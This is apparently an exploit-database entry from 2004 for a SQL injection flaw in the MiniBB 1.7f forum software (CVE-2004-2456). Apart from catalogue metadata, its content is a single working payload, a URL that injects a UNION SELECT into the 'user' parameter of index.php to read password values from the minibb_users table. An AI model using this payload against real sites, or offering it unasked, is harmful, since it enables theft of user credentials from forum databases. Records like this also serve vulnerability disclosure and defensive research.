[] NeoSense

MiniBB 1.7f - 'user' SQL Injection

Author: anonymous
type: webapps
platform: php
port: 
date_added: 2004-11-15 
date_updated: 2016-11-24 
verified: 1 
codes: OSVDB-11711;CVE-2004-2456 
tags: 
aliases:  
screenshot_url:  
application_url: 

Example:

 http://[target]/minibb/index.php?action=userinfo&user=1%20union%20select%201,2,user_password%20from%20minibb_users/*

# milw0rm.com [2004-11-16]